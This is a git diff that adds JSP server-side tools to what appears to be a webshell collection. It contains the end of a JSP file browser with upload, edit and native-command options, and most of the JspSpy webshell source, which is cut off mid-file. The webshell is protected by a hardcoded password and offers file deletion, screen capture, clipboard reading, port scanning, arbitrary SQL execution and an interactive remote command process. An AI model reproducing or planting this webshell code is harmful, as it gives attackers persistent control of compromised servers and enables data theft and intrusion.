{ + String dir = "" + request.getAttribute("dir"); + String file_name = request.getParameter("cr_dir"); + String new_file = getDir(dir, file_name); + if (!isAllowed(new File(new_file), true)){ + request.setAttribute("error", "You are not allowed to access " + new_file); + } + // Test, if file_name is empty + else if (!"".equals(file_name.trim()) && !file_name.endsWith(File.separator)) { + if (new File(new_file).createNewFile()) request.setAttribute("message", + "File created"); + else request.setAttribute("error", "Creation of file " + new_file + " failed"); + } + else request.setAttribute("error", "Error: " + file_name + " is not a valid filename"); + } + // Rename a file + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(RENAME_FILE))) { + Vector v = expandFileList(request.getParameterValues("selfile"), true); + String dir = "" + request.getAttribute("dir"); + String new_file_name = request.getParameter("cr_dir"); + String new_file = getDir(dir, new_file_name); + if (!isAllowed(new File(new_file), true)){ + request.setAttribute("error", "You are not allowed to access " + new_file); + } + // The error conditions: + // 1) Zero Files selected + else if (v.size() <= 0) request.setAttribute("error", + "Select exactly one file or folder. Rename failed"); + // 2a) Multiple files selected and the first isn't a dir + // Here we assume that expandFileList builds v from top-bottom, starting with the dirs + else if ((v.size() > 1) && !(((File) v.get(0)).isDirectory())) request.setAttribute( + "error", "Select exactly one file or folder. Rename failed"); + // 2b) If there are multiple files from the same directory, rename fails + else if ((v.size() > 1) && ((File) v.get(0)).isDirectory() + && !(((File) v.get(0)).getPath().equals(((File) v.get(1)).getParent()))) { + request.setAttribute("error", "Select exactly one file or folder. Rename failed"); + } + else { + File f = (File) v.get(0); + if (!isAllowed(f, true)){ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + } + // Test, if file_name is empty + else if ((new_file.trim() != "") && !new_file.endsWith(File.separator)) { + if (!f.canWrite() || !f.renameTo(new File(new_file.trim()))) { + request.setAttribute("error", "Creation of file " + new_file + " failed"); + } + else request.setAttribute("message", "Renamed file " + + ((File) v.get(0)).getName() + " to " + new_file); + } + else request.setAttribute("error", "Error: \"" + new_file_name + + "\" is not a valid filename"); + } + } + // Move selected file(s) + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(MOVE_FILES))) { + Vector v = expandFileList(request.getParameterValues("selfile"), true); + String dir = "" + request.getAttribute("dir"); + String dir_name = request.getParameter("cr_dir"); + String new_dir = getDir(dir, dir_name); + if (!isAllowed(new File(new_dir), false)){ + request.setAttribute("error", "You are not allowed to access " + new_dir); + } + else{ + boolean error = false; + // This ensures that new_dir is a directory + if (!new_dir.endsWith(File.separator)) new_dir += File.separator; + for (int i = v.size() - 1; i >= 0; i--) { + File f = (File) v.get(i); + if (!isAllowed(f, true)){ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + error = true; + break; + } + else if (!f.canWrite() || !f.renameTo(new File(new_dir + + f.getAbsolutePath().substring(dir.length())))) { + request.setAttribute("error", "Cannot move " + f.getAbsolutePath() + + ". Move aborted"); + error = true; + break; + } + } + if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files moved"); + else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File moved"); + else if (!error) request.setAttribute("error", "No files selected"); + } + } + // Copy Files + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(COPY_FILES))) { + Vector v = expandFileList(request.getParameterValues("selfile"), true); + String dir = (String) request.getAttribute("dir"); + if (!dir.endsWith(File.separator)) dir += File.separator; + String dir_name = request.getParameter("cr_dir"); + String new_dir = getDir(dir, dir_name); + if (!isAllowed(new File(new_dir), true)){ + request.setAttribute("error", "You are not allowed to access " + new_dir); + } + else{ + boolean error = false; + if (!new_dir.endsWith(File.separator)) new_dir += File.separator; + try { + byte buffer[] = new byte[0xffff]; + for (int i = 0; i < v.size(); i++) { + File f_old = (File) v.get(i); + File f_new = new File(new_dir + f_old.getAbsolutePath().substring(dir.length())); + if (!isAllowed(f_old, false)|| !isAllowed(f_new, true)){ + request.setAttribute("error", "You are not allowed to access " + f_new.getAbsolutePath()); + error = true; + } + else if (f_old.isDirectory()) f_new.mkdirs(); + // Overwriting is forbidden + else if (!f_new.exists()) { + copyStreams(new FileInputStream(f_old), new FileOutputStream(f_new), buffer); + } + else { + // File exists + request.setAttribute("error", "Cannot copy " + f_old.getAbsolutePath() + + ", file already exists. Copying aborted"); + error = true; + break; + } + } + } + catch (IOException e) { + request.setAttribute("error", "Error " + e + ". Copying aborted"); + error = true; + } + if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files copied"); + else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File copied"); + else if (!error) request.setAttribute("error", "No files selected"); + } + } + // Directory viewer + if (dir_view && request.getAttribute("dir") != null) { + File f = new File("" + request.getAttribute("dir")); + //Check, whether the dir exists + if (!f.exists() || !isAllowed(f, false)) { + if (!f.exists()){ + request.setAttribute("error", "Directory " + f.getAbsolutePath() + " does not exist."); + } + else{ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + } + //if attribute olddir exists, it will change to olddir + if (request.getAttribute("olddir") != null && isAllowed(new File((String) request.getAttribute("olddir")), false)) { + f = new File("" + request.getAttribute("olddir")); + } + //try to go to the parent dir + else { + if (f.getParent() != null && isAllowed(f, false)) f = new File(f.getParent()); + } + //If this dir also do also not exist, go back to browser.jsp root path + if (!f.exists()) { + String path = null; + if (application.getRealPath(request.getRequestURI()) != null) path = new File( + application.getRealPath(request.getRequestURI())).getParent(); + + if (path == null) // handle the case were we are not in a directory (ex: war file) + path = new File(".").getAbsolutePath(); + f = new File(path); + } + if (isAllowed(f, false)) request.setAttribute("dir", f.getAbsolutePath()); + else request.setAttribute("dir", null); + } +%> + +<%=request.getAttribute("dir")%> + + +<% + //Output message + if (request.getAttribute("message") != null) { + out.println("
    "); + out.println(request.getAttribute("message")); + out.println("
    "); + } + //Output error + if (request.getAttribute("error") != null) { + out.println("
    "); + out.println(request.getAttribute("error")); + out.println("
    "); + } + if (request.getAttribute("dir") != null){ +%> + +
    + Filename filter: +

    + +<% + // Output the table, starting with the headers. + String dir = URLEncoder.encode("" + request.getAttribute("dir")); + String cmd = browser_name + "?dir=" + dir; + int sortMode = 1; + if (request.getParameter("sort") != null) sortMode = Integer.parseInt(request + .getParameter("sort")); + int[] sort = new int[] {1, 2, 3, 4}; + for (int i = 0; i < sort.length; i++) + if (sort[i] == sortMode) sort[i] = -sort[i]; + out.print("" + + "" + + "" + + "" + + ""); + if (!READ_ONLY) out.print (""); + out.println(""); + char trenner = File.separatorChar; + // Output the Root-Dirs, without FORBIDDEN_DRIVES + File[] entry = File.listRoots(); + for (int i = 0; i < entry.length; i++) { + boolean forbidden = false; + for (int i2 = 0; i2 < FORBIDDEN_DRIVES.length; i2++) { + if (entry[i].getAbsolutePath().toLowerCase().equals(FORBIDDEN_DRIVES[i2])) forbidden = true; + } + if (!forbidden) { + out.println(""); + out.println(""); + } + } + // Output the parent directory link ".." + if (f.getParent() != null) { + out.println(""); + out.println(""); + } + // Output all files and dirs and calculate the number of files and total size + entry = f.listFiles(); + if (entry == null) entry = new File[] {}; + long totalSize = 0; // The total size of the files in the current directory + long fileCount = 0; // The count of files in the current working directory + if (entry != null && entry.length > 0) { + Arrays.sort(entry, new FileComp(sortMode)); + for (int i = 0; i < entry.length; i++) { + String name = URLEncoder.encode(entry[i].getAbsolutePath()); + String type = "File"; // This String will tell the extension of the file + if (entry[i].isDirectory()) type = "DIR"; // It's a DIR + else { + String tempName = entry[i].getName().replace(' ', '_'); + if (tempName.lastIndexOf('.') != -1) type = tempName.substring( + tempName.lastIndexOf('.')).toLowerCase(); + } + String ahref = ""; + String link = buf; // The standard view link, uses Mime-type + if (entry[i].isDirectory()) { + if (entry[i].canRead() && USE_DIR_PREVIEW) { + //Show the first DIR_PREVIEW_NUMBER directory entries in a tooltip + File[] fs = entry[i].listFiles(); + if (fs == null) fs = new File[] {}; + Arrays.sort(fs, new FileComp()); + StringBuffer filenames = new StringBuffer(); + for (int i2 = 0; (i2 < fs.length) && (i2 < 10); i2++) { + String fname = conv2Html(fs[i2].getName()); + if (fs[i2].isDirectory()) filenames.append("[" + fname + "];"); + else filenames.append(fname + ";"); + } + if (fs.length > DIR_PREVIEW_NUMBER) filenames.append("..."); + else if (filenames.length() > 0) filenames + .setLength(filenames.length() - 1); + link = ahref + "dir=" + name + "\" title=\"" + filenames + "\">" + + FOL_IMG + "[" + buf + "]"; + } + else if (entry[i].canRead()) { + link = ahref + "dir=" + name + "\">" + FOL_IMG + "[" + buf + "]"; + } + else link = FOL_IMG + "[" + buf + "]"; + } + else if (entry[i].isFile()) { //Entry is file + totalSize = totalSize + entry[i].length(); + fileCount = fileCount + 1; + if (entry[i].canRead()) { + dlink = ahref + "downfile=" + name + "\">Download"; + //If you click at the filename + if (USE_POPUP) link = ahref + "file=" + name + "\" target=\"_blank\">" + + buf + ""; + else link = ahref + "file=" + name + "\">" + buf + ""; + if (entry[i].canWrite()) { // The file can be edited + //If it is a zip or jar File you can unpack it + if (isPacked(name, true)) elink = ahref + "unpackfile=" + name + + "\">Unpack"; + else elink = ahref + "editfile=" + name + "\">Edit"; + } + else { // If the file cannot be edited + //If it is a zip or jar File you can unpack it + if (isPacked(name, true)) elink = ahref + "unpackfile=" + name + + "\">Unpack"; + else elink = ahref + "editfile=" + name + "\">View"; + } + } + else { + link = buf; + } + } + String date = dateFormat.format(new Date(entry[i].lastModified())); + out.println(""); + if (entry[i].canRead()) { + out.println(""); + } + else { + out.println(""); + } + out.print(""); + if (entry[i].isDirectory()) out.print(""); + else { + out.print(""); + } + out.println(""); // The download link + if (!READ_ONLY) + out.print (""); // The edit link (or view, depending) + out.println(""); + } + }%> +
     NameSizeTypeDate  
     "); + String name = URLEncoder.encode(entry[i].getAbsolutePath()); + String buf = entry[i].getAbsolutePath(); + out.println("  [" + buf + "]"); + out.print("    
    "); + out.println("  " + FOL_IMG + "[..]"); + out.print("    
     " + link + " " + + convertFileSize(entry[i].length()) + "" + type + "  " + // The file type (extension) + date + "" + // The date the file was created + dlink + "" + elink + "
    + Select all +

    + + <%=convertFileSize(totalSize)%> in <%=fileCount%> files in <%= dir2linkdir((String) request.getAttribute("dir"), browser_name, sortMode)%> + +

    + "> + + + <% if (!READ_ONLY) {%> + + <% } %> + <% if (!READ_ONLY) {%> +
    + + + + + + + <% } %> +
    +
    +
    + <% if (ALLOW_UPLOAD) { %> +
    + "> + + + +
    + <%} %> + <% if (NATIVE_COMMANDS) {%> +
    + "> + + + +
    <% + }%> +
    + <%}%> +
    +
    + jsp File Browser version <%= VERSION_NR%> by www.vonloesch.de +
    + +<% + } +%> diff --git a/jsp/hackk8/JSP/other/jspspy.jsp b/jsp/hackk8/JSP/other/jspspy.jsp new file mode 100644 index 0000000..219d801 --- /dev/null +++ b/jsp/hackk8/JSP/other/jspspy.jsp @@ -0,0 +1,2329 @@ +<%@page pageEncoding="UTF-8"%> +<%@page import="java.io.*"%> +<%@page import="java.util.*"%> +<%@page import="java.util.regex.*"%> +<%@page import="java.sql.*"%> +<%@page import="java.nio.charset.*"%> +<%@page import="javax.servlet.http.HttpServletRequestWrapper"%> +<%@page import="java.text.*"%> +<%@page import="java.net.*"%> +<%@page import="java.util.zip.*"%> +<%@page import="java.awt.*"%> +<%@page import="java.awt.image.*"%> +<%@page import="javax.imageio.*"%> +<%@page import="java.awt.datatransfer.DataFlavor"%> +<%@page import="java.util.prefs.Preferences"%> +<%! +/** +* Code By admin +* Date 2009-12-17 +* Blog http://www.baidu.com/ +* Huan . I Love You. +*/ +private static final String PW = "max"; //password +private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd"; +private static final String REQUEST_CHARSET = "ISO-8859-1"; +private static final String PAGE_CHARSET = "UTF-8"; +private static final String CURRENT_DIR = "currentdir"; +private static final String MSG = "SHOWMSG"; +private static final String PORT_MAP = "PMSA"; +private static final String DBO = "DBO"; +private static final String SHELL_ONLINE = "SHELL_ONLINE"; +private static String SHELL_NAME = ""; +private static String WEB_ROOT = null; +private static String SHELL_DIR = null; +public static Map ins = new HashMap(); +private static class MyRequest extends HttpServletRequestWrapper { +public MyRequest(HttpServletRequest req) { +super(req); +} +public String getParameter(String name) { +try { +String value = super.getParameter(name); +if (name == null) +return null; +return new String(value.getBytes(REQUEST_CHARSET),PAGE_CHARSET); +} catch (Exception e) { +return null; +} +} +} +private static class DBOperator{ +private Connection conn = null; +private Statement stmt = null; +private String driver; +private String url; +private String uid; +private String pwd; +public DBOperator(String driver,String url,String uid,String pwd) throws Exception { +this(driver,url,uid,pwd,false); +} +public DBOperator(String driver,String url,String uid,String pwd,boolean connect) throws Exception { +Class.forName(driver); +if (connect) +this.conn = DriverManager.getConnection(url,uid,pwd); +this.url = url; +this.driver = driver; +this.uid = uid; +this.pwd = pwd; +} +public void connect() throws Exception{ +this.conn = DriverManager.getConnection(url,uid,pwd); +} +public Object execute(String sql) throws Exception { +if (isValid()) { +stmt = conn.createStatement(); +if (stmt.execute(sql)) { +return stmt.getResultSet(); +} else { +return stmt.getUpdateCount(); +} +} +throw new Exception("Connection is inValid."); +} +public void closeStmt() throws Exception{ +if (this.stmt != null) +stmt.close(); +} +public boolean isValid() throws Exception { +return conn != null && !conn.isClosed(); +} +public void close() throws Exception { +if (isValid()) { +closeStmt(); +conn.close(); +} +} +public boolean equals(Object o) { +if (o instanceof DBOperator) { +DBOperator dbo = (DBOperator)o; +return this.driver.equals(dbo.driver) && this.url.equals(dbo.url) && this.uid.equals(dbo.uid) && this.pwd.equals(dbo.pwd); +} +return false; +} +} +private static class StreamConnector extends Thread { +private InputStream is; +private OutputStream os; +public StreamConnector( InputStream is, OutputStream os ){ +this.is = is; +this.os = os; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[8192]; +int length; +while((length = in.read( buffer, 0, buffer.length ))>0){ +out.write( buffer, 0, length ); +out.flush(); +} +} catch(Exception e){} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){} +} +} +private static class OnLineProcess { +private String cmd = "first"; +private Process pro; +public OnLineProcess(Process p){ +this.pro = p; +} +public void setPro(Process p) { +this.pro = p; +} +public void setCmd(String c){ +this.cmd = c; + +} +public String getCmd(){ +return this.cmd; +} +public Process getPro(){ +return this.pro; +} +public void stop(){ +this.pro.destroy(); +} +} +private static class OnLineConnector extends Thread { +private OnLineProcess ol = null; +private InputStream is; +private OutputStream os; +private String name; +public OnLineConnector( InputStream is, OutputStream os ,String name,OnLineProcess ol){ +this.is = is; +this.os = os; +this.name = name; +this.ol = ol; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[128]; +if(this.name.equals("exeRclientO")) { +//from exe to client +int length = 0; +while((length = in.read( buffer, 0, buffer.length ))>0){ +String str = new String(buffer, 0, length); +str = str.replace("&","&").replace("<","<").replace(">",">"); +str = str.replace(""+(char)13+(char)10,"
    "); +str = str.replace("\n","
    "); +out.write(str.toCharArray(), 0, str.length()); +out.flush(); +} +} else { +//from client to exe +while(true) { +while(this.ol.getCmd() == null) { +Thread.sleep(500); +} +if (this.ol.getCmd().equals("first")) { +this.ol.setCmd(null); +continue; +} +this.ol.setCmd(this.ol.getCmd() + (char)10); +char[] arr = this.ol.getCmd().toCharArray(); +out.write(arr,0,arr.length); +out.flush(); +this.ol.setCmd(null); +} +} +} catch(Exception e){ +} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){ +} +} +} +private static class Table{ +private ArrayList rows = null; +private boolean echoTableTag = false; +public void setEchoTableTag(boolean v) { +this.echoTableTag = v; +} +public Table(){ +this.rows = new ArrayList(); +} +public void addRow(Row r) { +this.rows.add(r); +} +public String toString(){ +StringBuilder html = new StringBuilder(); +if (echoTableTag) +html.append(""); +for (Row r:rows) { +html.append(""); +for (Column c:r.getColumns()) { +html.append(""); +} +html.append(""); +} +if (echoTableTag) +html.append("
    "); +String vv = Util.htmlEncode(Util.getStr(c.getValue())); +if (vv.equals("")) +vv = " "; +html.append(vv); +html.append("
    "); +return html.toString(); +} +} +private static class Row{ +private ArrayList cols = null; +public Row(){ +this.cols = new ArrayList(); +} +public void addColumn(Column n) { +this.cols.add(n); +} +public ArrayList getColumns(){ +return this.cols; +} +} +private static class Column{ +private String value; +public Column(String v){ +this.value = v; +} +public String getValue(){ +return this.value; +} +} +private static class Util{ +public static boolean isEmpty(String s) { +return s == null || s.trim().equals(""); +} +public static boolean isEmpty(Object o) { +return o == null || isEmpty(o.toString()); +} +public static String getSize(long size,char danwei) { +if (danwei == 'M') { +double v = formatNumber(size / 1024.0 / 1024.0,2); +if (v > 1024) { +return getSize(size,'G'); +}else { +return v + "M"; +} +} else if (danwei == 'G') { +return formatNumber(size / 1024.0 / 1024.0 / 1024.0,2)+"G"; +} else if (danwei == 'K') { +double v = formatNumber(size / 1024.0,2); +if (v > 1024) { +return getSize(size,'M'); +} else { +return v + "K"; +} +} else if (danwei == 'B') { +if (size > 1024) { +return getSize(size,'K'); +}else { +return size + "B"; +} +} +return ""+0+danwei; +} +public static double formatNumber(double value,int l) { +NumberFormat format = NumberFormat.getInstance(); +format.setMaximumFractionDigits(l); +format.setGroupingUsed(false); +return new Double(format.format(value)); +} +public static boolean isInteger(String v) { +if (isEmpty(v)) +return false; +return v.matches("^\\d+$"); +} +public static String formatDate(long time) { +SimpleDateFormat format = new SimpleDateFormat("yyyy-MM-dd hh:mm:ss"); +return format.format(new java.util.Date(time)); +} +public static String convertPath(String path) { +return path != null ? path.replace("\\","/") : ""; +} +public static String htmlEncode(String v) { +if (isEmpty(v)) +return ""; +return v.replace("&","&").replace("<","<").replace(">",">"); +} +public static String getStr(String s) { +return s == null ? "" :s; +} +public static String getStr(Object s) { +return s == null ? "" :s.toString(); +} +public static String exec(String regex, String str, int group) { +Pattern pat = Pattern.compile(regex); +Matcher m = pat.matcher(str); +if (m.find()) +return m.group(group); +return null; +} +public static void outMsg(Writer out,String msg) throws Exception { +outMsg(out,msg,"center"); +} +public static void outMsg(Writer out,String msg,String align) throws Exception { +if (msg.indexOf("java.lang.ClassNotFoundException") != -1) +msg = "Can Not Find The Driver!
    " + msg; +out.write("
    "+msg+"
    "); +} +} +private static class UploadBean { +private String fileName = null; +private String suffix = null; +private String savePath = ""; +private ServletInputStream sis = null; +private byte[] b = new byte[1024]; +public UploadBean() { +} +public void setSavePath(String path) { +this.savePath = path; +} +public void parseRequest(HttpServletRequest request) throws IOException { +sis = request.getInputStream(); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!= -1) { +s = new String(b, 0, a,PAGE_CHARSET); +if ((k = s.indexOf("filename=\""))!= -1) { +s = s.substring(k + 10); +k = s.indexOf("\""); +s = s.substring(0, k); +File tF = new File(s); +if (tF.isAbsolute()) { +fileName = tF.getName(); +} else { +fileName = s; +} +k = s.lastIndexOf("."); +suffix = s.substring(k + 1); +upload(); +} +} +} +private void upload() { +try { +FileOutputStream out = new FileOutputStream(new File(savePath,fileName)); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!=-1) { +s = new String(b, 0, a); +if ((k = s.indexOf("Content-Type:"))!=-1) { +break; +} +} +sis.readLine(b,0,b.length); +while ((a = sis.readLine(b,0,b.length)) != -1) { +s = new String(b, 0, a); +if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45) && (b[3] == 45) && (b[4] == 45)) { +break; +} +out.write(b, 0, a); +} +out.close(); +} catch (IOException ioe) { +ioe.printStackTrace(); +} +} +} +%> +<% +SHELL_NAME = request.getServletPath().substring(request.getServletPath().lastIndexOf("/")+1); +String myAbsolutePath = application.getRealPath(request.getServletPath()); +if (Util.isEmpty(myAbsolutePath)) {//for weblogic +SHELL_NAME = request.getServletPath(); +myAbsolutePath = new File(application.getResource("/").getPath()+SHELL_NAME).toString(); +SHELL_NAME=request.getContextPath()+SHELL_NAME; +WEB_ROOT = new File(application.getResource("/").getPath()).toString(); +} else { +WEB_ROOT = application.getRealPath("/"); +} +SHELL_DIR = Util.convertPath(myAbsolutePath.substring(0,myAbsolutePath.lastIndexOf(File.separator))); +if (session.getAttribute(CURRENT_DIR) == null) +session.setAttribute(CURRENT_DIR,Util.convertPath(SHELL_DIR)); +request = new MyRequest(request); +if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) { +String o = request.getParameter("o"); +if (o != null && o.equals("login")) { +ins.get("login").invoke(request,response,session); +return; +} else if (o != null && o.equals("vLogin")) { +ins.get("vLogin").invoke(request,response,session); +return; +} else { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} +} +%> +<%! +private static interface Invoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception; +public boolean doBefore(); +public boolean doAfter(); +} +private static class DefaultInvoker implements Invoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +} +public boolean doBefore(){ +return true; +} +public boolean doAfter() { +return true; +} +} +private static class ScriptInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); + +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BeforeInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("JspSpy Codz By - Ninty"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class AfterInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DeleteBatchInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (!Util.isEmpty(files)) { +String currentDir = JSession.getAttribute(CURRENT_DIR).toString(); +String[] arr = files.split(","); +for (String fs:arr) { +File f = new File(currentDir,fs); +f.delete(); +} +} +JSession.setAttribute(MSG,"Delete Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ClipBoardInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"
    "+ +"

    System Clipboard »

    "+ +"

    ");
+try{
+out.println(Util.htmlEncode(Util.getStr(Toolkit.getDefaultToolkit().getSystemClipboard().getData(DataFlavor.stringFlavor))));
+}catch (Exception ex) {
+out.println("ClipBoard is Empty Or Is Not Text Data !");
+}
+out.println("
    "+ +" "+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VRemoteControlInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
    "+ +"

    Remote Control »

    "+ +" Speed(Second , dont be so fast) Can Not Control Yet."+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//GetScreen +private static class GcInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Dimension size = Toolkit.getDefaultToolkit().getScreenSize(); +Rectangle rec = new Rectangle(0,0,(int)size.getWidth(),(int)size.getHeight()); +BufferedImage img = new Robot().createScreenCapture(rec); +response.setContentType("image/jpeg"); +ImageIO.write(img,"jpg",response.getOutputStream()); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VPortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +if (Util.isEmpty(ip)) +ip = "127.0.0.1"; +if (Util.isEmpty(ports)) +ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"; +if (Util.isEmpty(timeout)) +timeout = "2"; +out.println("
    "+ +"

    PortScan >>

    "+ +"
    "+ +"

    "+ +"IP : Port : Timeout (秒) : "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class PortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +ins.get("vPortScan").invoke(request,response,JSession); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +int iTimeout = 0; +if (Util.isEmpty(ip) || Util.isEmpty(ports)) +return; +if (!Util.isInteger(timeout)) { +timeout = "2"; +} +iTimeout = Integer.parseInt(timeout); +Map rs = new LinkedHashMap(); +String[] portArr = ports.split(","); +for (String port:portArr) { +try { +Socket s = new Socket(); +s.connect(new InetSocketAddress(ip,Integer.parseInt(port)),iTimeout); +s.close(); +rs.put(port,"Open"); +} catch (Exception e) { +rs.put(port,"Close"); +} +} +out.println("
    "); +Set> entrySet = rs.entrySet(); +for (Map.Entry e:entrySet) { +String port = e.getKey(); +String value = e.getValue(); +out.println(ip+" : "+port+" ................................. "+value+"
    "); +} +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VConnInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object obj = JSession.getAttribute(DBO); +if (obj == null || !((DBOperator)obj).isValid()) { +out.println(" "); +out.println("
    "+ +"
    "+ +""+ +"

    DataBase Manager »

    "+ +""+ +"

    "+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

    "+ +"
    "); +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//DBConnect +private static class DbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String driver = request.getParameter("driver"); +String url = request.getParameter("url"); +String uid = request.getParameter("uid"); +String pwd = request.getParameter("pwd"); +String sql = request.getParameter("sql"); +String selectDb = request.getParameter("selectDb"); +if (selectDb == null) +selectDb = JSession.getAttribute("selectDb").toString(); +else +JSession.setAttribute("selectDb",selectDb); +Object dbo = JSession.getAttribute(DBO); +if (dbo == null || !((DBOperator)dbo).isValid()) { +if (dbo != null) +((DBOperator)dbo).close(); +dbo = new DBOperator(driver,url,uid,pwd,true); +} else { +if (!Util.isEmpty(driver) && !Util.isEmpty(url) && !Util.isEmpty(uid)) { +DBOperator oldDbo = (DBOperator)dbo; +dbo = new DBOperator(driver,url,uid,pwd); +if (!oldDbo.equals(dbo)) { +((DBOperator)oldDbo).close(); +((DBOperator)dbo).connect(); +} else { +dbo = oldDbo; +} +} +} +DBOperator Ddbo = (DBOperator)dbo; +JSession.setAttribute(DBO,Ddbo); +Util.outMsg(out,"Connect To DataBase Success!"); +out.println(" "); +out.println("
    "+ +"
    "+ +""+ +"

    DataBase Manager »

    "+ +""+ +"

    "+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

    "+ +"
    "); +out.println("
    "+ +"

    Run SQL query/queries on database :

    "); +} catch (Exception e) { +//e.printStackTrace(); +throw e; +} +} +} +private static class ExecuteSQLInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String sql = request.getParameter("sql"); +String db = request.getParameter("selectDb"); +Object dbo = JSession.getAttribute(DBO); +if (!Util.isEmpty(sql)) { +if (dbo == null || !((DBOperator)dbo).isValid()) { +response.sendRedirect(SHELL_NAME+"?o=vConn"); +} else { +ins.get("dbc").invoke(request,response,JSession); +Object obj = ((DBOperator)dbo).execute(sql); +if (obj instanceof ResultSet) { +ResultSet rs = (ResultSet)obj; +ResultSetMetaData meta = rs.getMetaData(); +int colCount = meta.getColumnCount(); +out.println("

    Query#0 : "+Util.htmlEncode(sql)+"

    "); +out.println(""); +for (int i=1;i<=colCount;i++) { +out.println(""); +} +out.println(""); +Table tb = new Table(); +while(rs.next()) { +Row r = new Row(); +for (int i = 1;i<=colCount;i++) { +r.addColumn(new Column(rs.getString(i))); +} +tb.addRow(r); +} +out.println(tb.toString()); +out.println("
    "+meta.getColumnName(i)+"
    "+meta.getColumnTypeName(i)+"
    "); +rs.close(); +((DBOperator)dbo).closeStmt(); +} else { +out.println("

    affected rows : "+obj+"

